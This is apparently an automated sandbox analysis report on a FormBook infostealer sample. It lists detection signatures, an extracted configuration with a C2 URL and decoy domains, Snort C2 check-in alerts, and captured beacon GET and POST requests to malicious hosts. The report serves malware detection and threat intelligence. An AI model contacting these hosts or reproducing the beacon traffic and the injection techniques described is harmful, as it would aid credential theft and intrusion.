Windows Analysis Report
Noua lista de comenzi.exe

Overview

General Information

Sample Name: Noua lista de comenzi.exe
Analysis ID: 562316
MD5: c6c9905431f32998369ba3fce5743a2b
SHA1: 7523dc8923179973879c227ad1776ff583660e3d
SHA256: 527036f9e449de86dc23ca03f80ea7da2d0ee7d7752203bbfad4ffb9237a19a8
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}
Multi AV Scanner detection for submitted file
Source: Noua lista de comenzi.exe Virustotal: Detection: 32% Perma Link
Yara detected FormBook
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.cielotherepy.com/euv4/?BXxXk=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9Ej8w+ItW/Czf&nN6=6lpDqpn0n2Bl9fTP Avira URL Cloud: Label: malware
Source: http://www.ahmadfaizlajis.com/euv4/ Avira URL Cloud: Label: malware
Source: http://www.anniebapartments.com/euv4/?BXxXk=2pA74KfmfI5hbfJaDEWFAi8e35ziQ8w4QN1jZFvj4D6XG6sLMhvt5UuKdjwJiJArEaUB&x6VPE=5jf8Bvhx9 Avira URL Cloud: Label: malware
Source: http://www.alifdanismanlik.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=TRVfPireTl1Is9Bc/KiHpdfMWo5oXu88iiOyppyrwJSTQqYmoSBf8ZBQ12CtfhZ4Lehs Avira URL Cloud: Label: malware
Source: http://www.rematedeldia.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMt Avira URL Cloud: Label: malware
Source: www.rematedeldia.com/euv4/ Avira URL Cloud: Label: malware
Source: http://www.the-pumps.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=HAa1B5AppjYU5aCns58Lm/lX0LPKjP/AouTCOfgyvRhMztBouTXibUsUAqGI4dNLtbsU Avira URL Cloud: Label: malware
Source: http://www.bendyourtongue.com/euv4/?BXxXk=dD0iDvhn43tXR1Irz5moIEmsbBY1tPeSvnURlL34d3R1xCqqo0E9W1015A+nmD7pBEru&x6VPE=5jf8Bvhx9 Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: Noua lista de comenzi.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 22.2.logagent.exe.72480000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 25.0.logagent.exe.72480000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 22.0.logagent.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 25.0.logagent.exe.72480000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.DpiScaling.exe.72480000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 20.2.systray.exe.4ae796c.4.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 25.2.logagent.exe.72480000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 22.0.logagent.exe.72480000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.DpiScaling.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.DpiScaling.exe.72480000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.DpiScaling.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 22.0.logagent.exe.72480000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 22.0.logagent.exe.72480000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 25.0.logagent.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.DpiScaling.exe.72480000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 25.0.logagent.exe.72480000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 20.2.systray.exe.193198.1.unpack Avira: Label: TR/Patched.Ren.Gen8

Compliance
barindex
Uses 32bit PE files
Source: Noua lista de comenzi.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: Binary string: systray.pdb source: DpiScaling.exe, 0000000D.00000002.443630865.0000000000650000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: systray.pdbGCTL source: DpiScaling.exe, 0000000D.00000002.443630865.0000000000650000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 0000000D.00000002.445684941.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, DpiScaling.exe, 0000000D.00000002.447244201.00000000046FF000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.811879967.0000000004490000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812401712.00000000045AF000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.477462244.0000000004A3F000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.475842271.0000000004920000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000019.00000002.481489671.0000000004A40000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DpiScaling.exe, DpiScaling.exe, 0000000D.00000002.445684941.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, DpiScaling.exe, 0000000D.00000002.447244201.00000000046FF000.00000040.00000800.00020000.00000000.sdmp, systray.exe, systray.exe, 00000014.00000002.811879967.0000000004490000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812401712.00000000045AF000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.477462244.0000000004A3F000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.475842271.0000000004920000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000019.00000002.481489671.0000000004A40000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: DpiScaling.pdb source: systray.exe, 00000014.00000002.810319814.0000000000193000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812850284.0000000004AE7000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: DpiScaling.pdbGCTL source: systray.exe, 00000014.00000002.810319814.0000000000193000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812850284.0000000004AE7000.00000004.10000000.00040000.00000000.sdmp

Software Vulnerabilities
barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop ebx 20_2_02D46AB5
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 20_2_02D55676

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 198.54.117.215:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 198.54.117.215:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 198.54.117.215:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 192.0.78.240:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 192.0.78.240:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 192.0.78.240:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49818 -> 157.90.247.57:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49818 -> 157.90.247.57:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49818 -> 157.90.247.57:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 206.188.193.90:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 206.188.193.90:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 206.188.193.90:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49823 -> 162.0.214.189:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49823 -> 162.0.214.189:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49823 -> 162.0.214.189:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49826 -> 52.89.53.122:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49826 -> 52.89.53.122:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49826 -> 52.89.53.122:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49827 -> 162.0.214.189:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49827 -> 162.0.214.189:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49827 -> 162.0.214.189:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49833 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49833 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49833 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.alert78.info
Source: C:\Windows\explorer.exe Domain query: www.bestpleasure4u.com
Source: C:\Windows\explorer.exe Domain query: www.pkem.top
Source: C:\Windows\explorer.exe Domain query: www.awp.email
Source: C:\Windows\explorer.exe Domain query: www.librairie-adrienne.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.alifdanismanlik.com
Source: C:\Windows\explorer.exe Domain query: www.bendyourtongue.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.232.169 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.90.64.134 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.handejqr.com
Source: C:\Windows\explorer.exe Domain query: www.protection-onepa.com
Source: C:\Windows\explorer.exe Domain query: www.fabio.tools
Source: C:\Windows\explorer.exe Network Connect: 34.90.73.145 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 157.90.247.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.rematedeldia.com
Source: C:\Windows\explorer.exe Domain query: www.cielotherepy.com
Source: C:\Windows\explorer.exe Domain query: www.byausorsm26-plala.xyz
Source: C:\Windows\explorer.exe Network Connect: 206.188.193.90 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.the-pumps.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.20dzwww.com
Source: C:\Windows\explorer.exe Domain query: www.game2plays.com
Source: C:\Windows\explorer.exe Domain query: www.kreativevisibility.net
Source: C:\Windows\explorer.exe Network Connect: 162.0.214.189 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.t1uba.com
Source: C:\Windows\explorer.exe Network Connect: 52.89.53.122 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.240 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bubu3cin.com
Source: C:\Windows\explorer.exe Network Connect: 119.28.141.142 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.anniebapartments.com
Source: C:\Windows\explorer.exe Network Connect: 172.120.156.91 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.215 80 Jump to behavior
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.byausorsm26-plala.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.rematedeldia.com/euv4/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=85mQjwU+wMRs83r0GOSrcIreOiba9zyWW+CS0GLKbh9gHly9YGpiGKD2AN9MIjoCEE7/ HTTP/1.1Host: www.handejqr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=cI3g5knJJqXkP8IW+Xza8klzbxDoXV64MSKEiVzom8B632K++iscclio36YMg8rUOzdW&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.game2plays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=HAa1B5AppjYU5aCns58Lm/lX0LPKjP/AouTCOfgyvRhMztBouTXibUsUAqGI4dNLtbsU HTTP/1.1Host: www.the-pumps.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=dD0iDvhn43tXR1Irz5moIEmsbBY1tPeSvnURlL34d3R1xCqqo0E9W1015A+nmD7pBEru&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.bendyourtongue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=oa9knNpzlYsET7a400NCf8AEb2m6hfIC7IipfrPHZRwez4UH0nI2ep6CPiEzZPUmbJ08 HTTP/1.1Host: www.librairie-adrienne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=TRVfPireTl1Is9Bc/KiHpdfMWo5oXu88iiOyppyrwJSTQqYmoSBf8ZBQ12CtfhZ4Lehs HTTP/1.1Host: www.alifdanismanlik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=2pA74KfmfI5hbfJaDEWFAi8e35ziQ8w4QN1jZFvj4D6XG6sLMhvt5UuKdjwJiJArEaUB&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.anniebapartments.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=cWiJLLMFkNIAGeNHPwohgYgPINYIsRPE+G/+VQN9zUpY6o9lKCFsb+tpXVk1tI7skOBU HTTP/1.1Host: www.20dzwww.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMt HTTP/1.1Host: www.rematedeldia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=a7oTRd/pafA2z6myMPYHhwtmlIDdFKKQLm2w9Ocm2aQfWI2wtWEKtniCrep29h+E27Ao&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.t1uba.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj HTTP/1.1Host: www.bubu3cin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=0/dJtH7M4g2rGzhc4ssn0iUTCcnOaabGkVzvgj8FSqwfpf+jwBLQmuE48r3s2Xb3yHtY HTTP/1.1Host: www.bestpleasure4u.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9Ej8w+ItW/Czf&nN6=6lpDqpn0n2Bl9fTP HTTP/1.1Host: www.cielotherepy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=rHTt4/gAXbFdLDnVce2ivV2H4joOeuBJUkkeDtonXvza2SG7LjkAPmebStjpTvpYTNdp HTTP/1.1Host: www.pkem.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.bubu3cin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /euv4/?BXxXk=QBHbLVxXFBQ8vZs3HYaMEcVKayZ3Jv10zmSp74hjINFs4RkrUT15e8jtDg9xTHBGuf3s&nN6=6lpDqpn0n2Bl9fTP HTTP/1.1Host: www.mehfeels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /euv4/ HTTP/1.1Host: www.mehfeels.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.mehfeels.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mehfeels.com/euv4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 58 78 58 6b 3d 66 44 7a 68 56 79 42 43 5a 54 41 62 35 72 56 62 62 76 4c 37 56 35 56 52 4f 67 64 45 42 64 35 49 70 42 7a 71 71 34 52 6d 50 50 5a 4e 39 46 4d 4b 53 41 34 42 4d 59 54 75 52 79 42 37 61 46 74 76 6d 73 43 62 45 53 77 76 57 75 57 54 6a 72 64 4e 73 32 38 53 7a 76 50 56 34 71 6b 35 77 75 76 6e 51 74 73 53 48 38 6f 6c 79 4e 6e 2d 48 45 34 44 51 4e 58 67 39 5f 32 38 50 76 7a 77 50 66 65 44 57 36 36 32 7a 62 63 6c 59 49 4c 34 53 42 57 73 69 48 4d 69 28 4f 6e 6f 4d 64 61 56 78 66 32 47 6e 75 70 31 6a 6c 51 4f 6b 65 61 52 6b 6c 69 49 44 33 56 78 6b 61 71 78 76 6a 41 74 4f 34 6b 77 4d 39 39 6d 44 2d 62 4a 6d 4b 43 6f 37 30 43 39 76 4b 78 39 69 63 4e 65 56 77 32 4e 73 67 78 50 41 4d 73 72 59 56 36 63 7a 48 73 6b 56 4e 49 77 47 62 6d 4f 6c 4c 70 64 4e 41 71 39 34 4f 36 57 4e 63 39 56 4b 53 61 4f 48 57 54 57 38 4b 6d 31 39 6c 6d 78 69 44 58 4e 56 4a 64 52 56 73 39 68 53 74 48 76 43 66 67 76 6f 44 50 55 79 61 59 53 6b 37 72 30 28 35 42 39 70 2d 7e 6a 56 77 65 46 55 77 78 54 75 4a 4d 2d 48 38 68 52 49 35 76 6f 47 43 57 56 34 5a 49 70 73 50 4f 36 39 34 6b 52 34 38 62 53 58 43 48 34 4b 72 4a 4c 31 39 4b 4f 54 5f 78 59 56 4f 39 6d 39 6d 39 70 30 66 7a 5a 65 2d 52 6f 64 53 45 59 49 74 39 4c 6e 66 74 49 54 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 